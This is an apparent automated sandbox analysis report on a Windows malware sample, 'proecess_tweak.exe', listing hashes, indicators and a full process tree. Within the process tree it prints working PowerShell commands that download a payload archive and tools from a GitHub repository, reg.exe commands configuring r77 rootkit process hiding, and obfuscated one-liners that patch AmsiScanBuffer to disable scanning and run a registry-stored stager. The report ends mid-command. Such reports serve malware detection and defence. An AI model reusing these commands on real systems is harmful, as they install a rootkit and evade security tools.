Analysis
max time kernel: 15s
max time network: 33s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06/04/2024, 15:11
Static task: static1
Behavioral task: behavioral1
Sample: proecess_tweak.exe
Resource: win10v2004-20240226-en
General
Target: proecess_tweak.exe
Size: 152KB
MD5: 405e17f3d0148a762938a52155cceec3
SHA1: a01e3615c65caf0349302176f8fe06c0287220ff
SHA256: 6047361195df841490029d548ec39d414f6df48d1f0b1bbfb8bf0c7a697fff5a
SHA512: 3dda3321d16132bd8ad3299b37d1331eeb69acb402168ec3be9fcab787ad49adb253f1744b27ac24380d3a5bb9fbad8a8e37fc02b3bc509972447d18f080da3d
SSDEEP: 3072:ovGyYiSDnt1M5GWp1icKAArDZz4N9GhbkrNEk1Sq4:M4Op0yN90QEp
Malware Config
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
description | pid | Process | procid_target
PID 4864 created 612 | 4864 | powershell.exe | 5

Blocklisted process makes network request (8 IoCs)
flow | pid | Process
6 | 1932 | powershell.exe
9 | 1932 | powershell.exe
18 | 528 | powershell.exe
19 | 528 | powershell.exe
20 | 1904 | powershell.exe
21 | 1904 | powershell.exe
22 | 2272 | powershell.exe
23 | 2272 | powershell.exe

Downloads MZ/PE file

Executes dropped EXE (3 IoCs)
pid | Process
3924 | 7z.exe
3972 | Install.exe
1664 | Install.exe

Loads dropped DLL (1 IoC)
pid | Process
3924 | 7z.exe

Adds Run key to start application (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | proecess_tweak.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 5 IoCs)
flow | ioc
8 | raw.githubusercontent.com
9 | raw.githubusercontent.com
19 | raw.githubusercontent.com
21 | raw.githubusercontent.com
23 | raw.githubusercontent.com
Drops file in System32 directory (27 IoCs)
description | ioc | Process
File created | C:\Windows\System32\spool\tools\en-US\Examples\InstallShellCode.cs | 7z.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\Helper32.exe | 7z.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\Install.exe | 7z.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\r77-x64.dll | 7z.exe
File created | C:\Windows\System32\spool\tools\en-US\Requtment.clx | powershell.exe
File created | C:\Windows\System32\spool\tools\en-US\BytecodeApi.dll | 7z.exe
File created | C:\Windows\System32\spool\tools\en-US\Helper32.exe | 7z.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\Helper64.exe | 7z.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\r77-x86.dll | 7z.exe
File created | C:\Windows\System32\spool\tools\en-US\7z.exe | powershell.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\Examples\InstallShellCode.cpp | 7z.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\BytecodeApi.dll | 7z.exe
File created | C:\Windows\System32\spool\tools\en-US\salam.7z | powershell.exe
File created | C:\Windows\System32\spool\tools\en-US\Helper64.exe | 7z.exe
File created | C:\Windows\System32\spool\tools\en-US\Install.shellcode | 7z.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\Examples\InstallShellCode.cs | 7z.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\Install.shellcode | 7z.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\BytecodeApi.UI.dll | 7z.exe
File created | C:\Windows\System32\spool\tools\en-US\r77-x86.dll | 7z.exe
File created | C:\Windows\System32\spool\tools\en-US\Examples\InstallShellCode.cpp | 7z.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\Examples | 7z.exe
File created | C:\Windows\System32\spool\tools\en-US\Examples\ControlPipe.cpp | 7z.exe
File created | C:\Windows\System32\spool\tools\en-US\BytecodeApi.UI.dll | 7z.exe
File created | C:\Windows\System32\spool\tools\en-US\Install.exe | 7z.exe
File created | C:\Windows\System32\spool\tools\en-US\7z.dll | powershell.exe
File created | C:\Windows\System32\spool\tools\en-US\r77-x64.dll | 7z.exe
File opened for modification | C:\Windows\System32\spool\tools\en-US\Examples\ControlPipe.cpp | 7z.exe
Suspicious use of SetThreadContext (1 IoC)
description | pid | Process | procid_target
PID 4864 set thread context of 1644 | 4864 | powershell.exe | 132

Delays execution with timeout.exe (1 IoC)
pid | Process
2932 | timeout.exe
Modifies data under HKEY_USERS (41 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Suspicious behavior: EnumeratesProcesses (16 IoCs)
pid | Process
1932 | powershell.exe
1932 | powershell.exe
528 | powershell.exe
528 | powershell.exe
1904 | powershell.exe
1904 | powershell.exe
2272 | powershell.exe
2272 | powershell.exe
4864 | powershell.exe
4864 | powershell.exe
4864 | powershell.exe
4864 | powershell.exe
2084 | powershell.EXE
2084 | powershell.EXE
2684 | powershell.EXE
2684 | powershell.EXE

Suspicious use of AdjustPrivilegeToken (12 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 1932 | powershell.exe
Token: SeDebugPrivilege | 528 | powershell.exe
Token: SeDebugPrivilege | 1904 | powershell.exe
Token: SeDebugPrivilege | 2272 | powershell.exe
Token: SeRestorePrivilege | 3924 | 7z.exe
Token: 35 | 3924 | 7z.exe
Token: SeSecurityPrivilege | 3924 | 7z.exe
Token: SeSecurityPrivilege | 3924 | 7z.exe
Token: SeDebugPrivilege | 4864 | powershell.exe
Token: SeDebugPrivilege | 4864 | powershell.exe
Token: SeDebugPrivilege | 2084 | powershell.EXE
Token: SeDebugPrivilege | 2684 | powershell.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 1864 wrote to memory of 3232 | 1864 | proecess_tweak.exe | 86
PID 1864 wrote to memory of 3232 | 1864 | proecess_tweak.exe | 86
PID 3232 wrote to memory of 1932 | 3232 | cmd.exe | 88
PID 3232 wrote to memory of 1932 | 3232 | cmd.exe | 88
PID 3232 wrote to memory of 528 | 3232 | cmd.exe | 94
PID 3232 wrote to memory of 528 | 3232 | cmd.exe | 94
PID 3232 wrote to memory of 1904 | 3232 | cmd.exe | 97
PID 3232 wrote to memory of 1904 | 3232 | cmd.exe | 97
PID 3232 wrote to memory of 2272 | 3232 | cmd.exe | 99
PID 3232 wrote to memory of 2272 | 3232 | cmd.exe | 99
PID 3232 wrote to memory of 3924 | 3232 | cmd.exe | 102
PID 3232 wrote to memory of 3924 | 3232 | cmd.exe | 102
PID 3232 wrote to memory of 2932 | 3232 | cmd.exe | 103
PID 3232 wrote to memory of 2932 | 3232 | cmd.exe | 103
PID 3232 wrote to memory of 4300 | 3232 | cmd.exe | 104
PID 3232 wrote to memory of 4300 | 3232 | cmd.exe | 104
PID 3232 wrote to memory of 4400 | 3232 | cmd.exe | 105
PID 3232 wrote to memory of 4400 | 3232 | cmd.exe | 105
PID 3232 wrote to memory of 1544 | 3232 | cmd.exe | 106
PID 3232 wrote to memory of 1544 | 3232 | cmd.exe | 106
PID 3232 wrote to memory of 4792 | 3232 | cmd.exe | 107
PID 3232 wrote to memory of 4792 | 3232 | cmd.exe | 107
PID 3232 wrote to memory of 2368 | 3232 | cmd.exe | 108
PID 3232 wrote to memory of 2368 | 3232 | cmd.exe | 108
PID 3232 wrote to memory of 3056 | 3232 | cmd.exe | 109
PID 3232 wrote to memory of 3056 | 3232 | cmd.exe | 109
PID 3232 wrote to memory of 3060 | 3232 | cmd.exe | 110
PID 3232 wrote to memory of 3060 | 3232 | cmd.exe | 110
PID 3232 wrote to memory of 1812 | 3232 | cmd.exe | 111
PID 3232 wrote to memory of 1812 | 3232 | cmd.exe | 111
PID 3232 wrote to memory of 4740 | 3232 | cmd.exe | 112
PID 3232 wrote to memory of 4740 | 3232 | cmd.exe | 112
PID 3232 wrote to memory of 2888 | 3232 | cmd.exe | 113
PID 3232 wrote to memory of 2888 | 3232 | cmd.exe | 113
PID 3232 wrote to memory of 4888 | 3232 | cmd.exe | 114
PID 3232 wrote to memory of 4888 | 3232 | cmd.exe | 114
PID 3232 wrote to memory of 3944 | 3232 | cmd.exe | 115
PID 3232 wrote to memory of 3944 | 3232 | cmd.exe | 115
PID 3232 wrote to memory of 1796 | 3232 | cmd.exe | 116
PID 3232 wrote to memory of 1796 | 3232 | cmd.exe | 116
PID 3232 wrote to memory of 4852 | 3232 | cmd.exe | 117
PID 3232 wrote to memory of 4852 | 3232 | cmd.exe | 117
PID 3232 wrote to memory of 3828 | 3232 | cmd.exe | 118
PID 3232 wrote to memory of 3828 | 3232 | cmd.exe | 118
PID 3232 wrote to memory of 1736 | 3232 | cmd.exe | 119
PID 3232 wrote to memory of 1736 | 3232 | cmd.exe | 119
PID 3232 wrote to memory of 1056 | 3232 | cmd.exe | 120
PID 3232 wrote to memory of 1056 | 3232 | cmd.exe | 120
PID 3232 wrote to memory of 3972 | 3232 | cmd.exe | 121
PID 3232 wrote to memory of 3972 | 3232 | cmd.exe | 121
PID 3232 wrote to memory of 3972 | 3232 | cmd.exe | 121
PID 3232 wrote to memory of 1664 | 3232 | cmd.exe | 126
PID 3232 wrote to memory of 1664 | 3232 | cmd.exe | 126
PID 3232 wrote to memory of 1664 | 3232 | cmd.exe | 126
PID 3232 wrote to memory of 4864 | 3232 | cmd.exe | 131
PID 3232 wrote to memory of 4864 | 3232 | cmd.exe | 131
PID 4864 wrote to memory of 1644 | 4864 | powershell.exe | 132
PID 4864 wrote to memory of 1644 | 4864 | powershell.exe | 132
PID 4864 wrote to memory of 1644 | 4864 | powershell.exe | 132
PID 4864 wrote to memory of 1644 | 4864 | powershell.exe | 132
PID 4864 wrote to memory of 1644 | 4864 | powershell.exe | 132
PID 4864 wrote to memory of 1644 | 4864 | powershell.exe | 132
PID 4864 wrote to memory of 1644 | 4864 | powershell.exe | 132
PID 4864 wrote to memory of 1644 | 4864 | powershell.exe | 132
Processes
C:\Windows\system32\winlogon.exe (PID 612)
  Command line: winlogon.exe
  C:\Windows\System32\dllhost.exe (PID 1644)
    Command line: C:\Windows\System32\dllhost.exe /Processid:{18311907-a241-493b-82f0-bb66fcfb5694}

C:\Users\Admin\AppData\Local\Temp\proecess_tweak.exe (PID 1864)
  Command line: "C:\Users\Admin\AppData\Local\Temp\proecess_tweak.exe"
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  C:\Windows\SYSTEM32\cmd.exe (PID 3232)
    Command line: cmd /c "proecess_tweak.bat"
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1932)
      Command line: powershell -Command "Invoke-WebRequest https://github.com/setrofn/SD/raw/main/salam.7z -OutFile C:\Windows\System32\spool\tools\en-US\salam.7z"
      - Blocklisted process makes network request
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 528)
      Command line: powershell -Command "Invoke-WebRequest https://github.com/setrofn/SD/raw/main/Requtment.clx -OutFile C:\Windows\System32\spool\tools\en-US\Requtment.clx"
      - Blocklisted process makes network request
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1904)
      Command line: powershell -Command "Invoke-WebRequest https://github.com/setrofn/SD/raw/main/7z.exe -OutFile C:\Windows\System32\spool\tools\en-US\7z.exe"
      - Blocklisted process makes network request
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2272)
      Command line: powershell -Command "Invoke-WebRequest https://github.com/setrofn/SD/raw/main/7z.dll -OutFile C:\Windows\System32\spool\tools\en-US\7z.dll"
      - Blocklisted process makes network request
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\spool\tools\en-US\7z.exe (PID 3924)
      Command line: "C:\Windows\System32\spool\tools\en-US\7z.exe" x "C:\Windows\System32\spool\tools\en-US\salam.7z" -r -y -oC:\Windows\System32\spool\tools\en-US
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in System32 directory
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\timeout.exe (PID 2932)
      Command line: timeout 3
      - Delays execution with timeout.exe
    C:\Windows\system32\reg.exe (PID 4300)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "wininit.exe" /t REG_SZ /d "wininit.exe" /f
    C:\Windows\system32\reg.exe (PID 4400)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "svchost.exe" /t REG_SZ /d "svchost.exe" /f
    C:\Windows\system32\reg.exe (PID 1544)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "csrss.exe" /t REG_SZ /d "csrss.exe" /f
    C:\Windows\system32\reg.exe (PID 4792)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "dwm.exe" /t REG_SZ /d "dwm.exe" /f
    C:\Windows\system32\reg.exe (PID 2368)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "lsass.exe" /t REG_SZ /d "lsass.exe" /f
    C:\Windows\system32\reg.exe (PID 3056)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "services.exe" /t REG_SZ /d "services.exe" /f
    C:\Windows\system32\reg.exe (PID 3060)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "warp-svc.exe" /t REG_SZ /d "warp-svc.exe" /f
    C:\Windows\system32\reg.exe (PID 1812)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "dllhost.exe" /t REG_SZ /d "dllhost.exe" /f
    C:\Windows\system32\reg.exe (PID 4740)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "audiodg.exe" /t REG_SZ /d "audiodg.exe" /f
    C:\Windows\system32\reg.exe (PID 2888)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "sihost.exe" /t REG_SZ /d "sihost.exe" /f
    C:\Windows\system32\reg.exe (PID 4888)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "smss.exe" /t REG_SZ /d "smss.exe" /f
    C:\Windows\system32\reg.exe (PID 3944)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "fontdrvhost.exe" /t REG_SZ /d "fontdrvhost.exe" /f
    C:\Windows\system32\reg.exe (PID 1796)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "ctfmon.exe" /t REG_SZ /d "ctfmon.exe" /f
    C:\Windows\system32\reg.exe (PID 4852)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "RuntimeBroker.exe" /t REG_SZ /d "RuntimeBroker.exe" /f
    C:\Windows\system32\reg.exe (PID 3828)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "taskhostw.exe" /t REG_SZ /d "taskhostw.exe" /f
    C:\Windows\system32\reg.exe (PID 1736)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "ApplicationFrameHost.exe" /t REG_SZ /d "ApplicationFrameHost.exe" /f
    C:\Windows\system32\reg.exe (PID 1056)
      Command line: Reg.exe add "HKLM\SOFTWARE\$77config\process_names" /v "conhost.exe" /t REG_SZ /d "conhost.exe" /f
    C:\Windows\System32\spool\tools\en-US\Install.exe (PID 3972)
      Command line: "C:\Windows\System32\spool\tools\en-US\Install.exe"
      - Executes dropped EXE
    C:\Windows\System32\spool\tools\en-US\Install.exe (PID 1664)
      Command line: "C:\Windows\System32\spool\tools\en-US\Install.exe"
      - Executes dropped EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4864)
      Command line: powershell.exe -command "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE (PID 4824)
  Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:nJPykIqMjSVN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MaGVQLeFRfdNbn,[Parameter(Position=1)][Type]$GptlgIUwiG)$OydsIqVoVAx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$OydsIqVoVAx.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$MaGVQLeFRfdNbn).SetImplementationFlags('Runtime,Managed');$OydsIqVoVAx.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$GptlgIUwiG,$MaGVQLeFRfdNbn).SetImplementationFlags('Runtime,Managed');Write-Output $OydsIqVoVAx.CreateType();}$smGxynFlHuhkC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XJxqzvzRvDODYA=$smGxynFlHuhkC.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$izAjtDpTcIykCFLvLFo=nJPykIqMjSVN @([String])([IntPtr]);$zcszEmVRTVnMKlgIWZVgpJ=nJPykIqMjSVN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$clZdOUKBIWi=$smGxynFlHuhkC.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$EVLGDNMGdOdUkU=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$clZdOUKBIWi,[Object]('Load'+'LibraryA')));$tUgonAQzgoaRjxFau=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$clZdOUKBIWi,[Object]('Vir'+'tual'+'Pro'+'tect')));$zXIxall=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EVLGDNMGdOdUkU,$izAjtDpTcIykCFLvLFo).Invoke('a'+'m'+'si.dll');$LqcfvWYDFBJgJSDUM=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$zXIxall,[Object]('Ams'+'iSc'+'an'+'Buffer')));$LKXnSGWcBi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tUgonAQzgoaRjxFau,$zcszEmVRTVnMKlgIWZVgpJ).Invoke($LqcfvWYDFBJgJSDUM,[uint32]8,4,[ref]$LKXnSGWcBi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$LqcfvWYDFBJgJSDUM,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tUgonAQzgoaRjxFau,$zcszEmVRTVnMKlgIWZVgpJ).Invoke($LqcfvWYDFBJgJSDUM,[uint32]8,0x20,[ref]$LKXnSGWcBi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 2084)
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OrcKlnKOHJta{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZkBOuMBKjzmISm,[Parameter(Position=1)][Type]$TTLjIuaxNc)$LORruiFvXUU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LORruiFvXUU.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$ZkBOuMBKjzmISm).SetImplementationFlags('Runtime,Managed');$LORruiFvXUU.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$TTLjIuaxNc,$ZkBOuMBKjzmISm).SetImplementationFlags('Runtime,Managed');Write-Output $LORruiFvXUU.CreateType();}$HElwIrNbCPEps=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$NbBYFnZdLBdXUD=$HElwIrNbCPEps.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ObqsWLLoqAsNCkClHIu=OrcKlnKOHJta @([String])([IntPtr]);$JcstHrgkOadiYQpahjCtzI=OrcKlnKOHJta @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$amKDEwymedi=$HElwIrNbCPEps.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$wmFTlrkFCkPUwp=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$amKDEwymedi,[Object]('Load'+'LibraryA')));$XLzSFTPCeGfSoakCk=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$amKDEwymedi,[Object]('Vir'+'tual'+'Pro'+'tect')));$uhtiJOu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wmFTlrkFCkPUwp,$ObqsWLLoqAsNCkClHIu).Invoke('a'+'m'+'si.dll');$RdSeVohReyYAbPLiY=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$uhtiJOu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$BAnzZuInjX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XLzSFTPCeGfSoakCk,$JcstHrgkOadiYQpahjCtzI).Invoke($RdSeVohReyYAbPLiY,[uint32]8,4,[ref]$BAnzZuInjX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RdSeVohReyYAbPLiY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XLzSFTPCeGfSoakCk,$JcstHrgkOadiYQpahjCtzI).Invoke($RdSeVohReyYAbPLiY,[uint32]8,0x20,[ref]$BAnzZuInjX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE (PID 4620)
  Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:nJPykIqMjSVN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MaGVQLeFRfdNbn,[Parameter(Position=1)][Type]$GptlgIUwiG)$OydsIqVoVAx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$OydsIqVoVAx.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$MaGVQLeFRfdNbn).SetImplementationFlags('Runtime,Managed');$OydsIqVoVAx.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$GptlgIUwiG,$MaGVQLeFRfdNbn).SetImplementationFlags('Runtime,Managed');Write-Output $OydsIqVoVAx.CreateType();}$smGxynFlHuhkC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 